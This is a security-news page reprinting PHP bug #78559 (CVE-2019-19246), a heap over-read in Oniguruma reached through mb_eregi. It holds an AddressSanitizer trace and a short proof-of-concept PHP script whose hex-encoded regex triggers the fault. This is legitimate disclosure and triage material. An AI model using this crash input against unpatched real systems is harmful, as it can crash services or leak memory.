Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2019-19246: Heap buffer overflow in mb_eregi

Oniguruma through 6.9.3, as used in PHP 7.3.x and other products, has a heap-based buffer over-read in str_lower_case_match in regexec.c.

CVE
#git#php#buffer_overflow#sap

Sec Bug #78559

Heap buffer overflow in mb_eregi

Submitted:

2019-09-18 10:48 UTC

Modified:

2019-09-24 04:50 UTC

From:

[email protected]

Assigned:

stas (profile)

Status:

Closed

Package:

mbstring related

PHP Version:

7.3.9

OS:

Private report:

No

CVE-ID:

None

[2019-09-18 10:48 UTC] [email protected]

Description:

Against libonig 2.9.3 the test script gives:

================================================================= ==17768==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000023727 at pc 0x00000184bd62 bp 0x7ffda9f2f1d0 sp 0x7ffda9f2f1c8 READ of size 1 at 0x603000023727 thread T0 #0 0x184bd61 in str_lower_case_match /home/nikic/libonig/src/regexec.c:4017:11 #1 0x184bd61 in slow_search_ic /home/nikic/libonig/src/regexec.c:4040:9 #2 0x184bd61 in forward_search_range /home/nikic/libonig/src/regexec.c:4355:9 #3 0x18487df in onig_search_with_param /home/nikic/libonig/src/regexec.c:4778:17 #4 0x1847554 in onig_search /home/nikic/libonig/src/regexec.c:4574:7 #5 0xa99ad0 in _php_mb_onig_search /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:878:8 #6 0xa99ad0 in _php_mb_regex_ereg_exec /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:936:6 #7 0x168f607 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:1326:2 #8 0x148597c in execute_ex /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:54074:7 #9 0x148605c in zend_execute /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:58355:2 #10 0x130625f in zend_execute_scripts /home/nikic/php-src-fuzz/Zend/zend.c:1643:4 #11 0x10f0935 in php_execute_script /home/nikic/php-src-fuzz/main/main.c:2587:14 #12 0x17979c0 in do_cli /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:961:5 #13 0x1794a0f in main /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:1352:18 #14 0x7ff709f62b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/…/csu/libc-start.c:310 #15 0x447139 in _start (/home/nikic/php-src-fuzz/sapi/cli/php+0x447139)

0x603000023727 is located 0 bytes to the right of 23-byte region [0x603000023710,0x603000023727) allocated by thread T0 here: #0 0x4bf03d in malloc (/home/nikic/php-src-fuzz/sapi/cli/php+0x4bf03d) #1 0x17f44c0 in set_optimize_exact /home/nikic/libonig/src/regcomp.c:5687:25 #2 0x17f44c0 in set_optimize_info_from_tree /home/nikic/libonig/src/regcomp.c:5800:11 #3 0x17f44c0 in onig_compile /home/nikic/libonig/src/regcomp.c:6194:7 #4 0x1817d6e in onig_new /home/nikic/libonig/src/regcomp.c:6356:7 #5 0xaa018d in php_mbregex_compile_pattern /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:467:19 #6 0xa99a48 in _php_mb_regex_ereg_exec /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:927:7 #7 0x168f607 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:1326:2 #8 0x148597c in execute_ex /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:54074:7 #9 0x148605c in zend_execute /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:58355:2 #10 0x130625f in zend_execute_scripts /home/nikic/php-src-fuzz/Zend/zend.c:1643:4 #11 0x10f0935 in php_execute_script /home/nikic/php-src-fuzz/main/main.c:2587:14 #12 0x17979c0 in do_cli /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:961:5 #13 0x1794a0f in main /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:1352:18 #14 0x7ff709f62b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/…/csu/libc-start.c:310

Test script:

<?php $str = "5b5b5b5b5b5b5b492a5bce946b5c4b5d5c6b5c4b5d5c4b5d1cceb04b5d1cceb07a73717e4b1c52525252525252525252525252525252525252525252525252492a5bce946b5c4b5d5c6b5c4b5d5c4b5d1cceb04b5d1cceb07a73717e4b1c1cceb04b5d1cceb07a73717e4b1c302c36303030ceb07b7bd2a15c305c30663f436f6e74655c5238416711087b363030302c36303030ceb07b7b7b7b7b7b7b363030302c36303030ceb07b7b7b7b7b7b7b4a01"; $str = hex2bin($str); var_dump(mb_eregi($str, $str));

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2019-09-18 12:11 UTC] [email protected]

It looks like this is already fixed with current oniguruma master.

[2019-09-20 17:05 UTC] [email protected]

-Status: Open +Status: Analyzed -Assigned To: +Assigned To: stas

[2019-09-24 04:51 UTC] [email protected]

-Status: Analyzed +Status: Closed

Related news

CVE-2022-46756: DSA-2022-335: Dell VxRail Security Update for Multiple Third-Party Component Vulnerabilities

Dell VxRail, versions prior to 7.0.410, contain a Container Escape Vulnerability. A local high-privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the container's underlying OS. Exploitation may lead to a system take over by an attacker.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907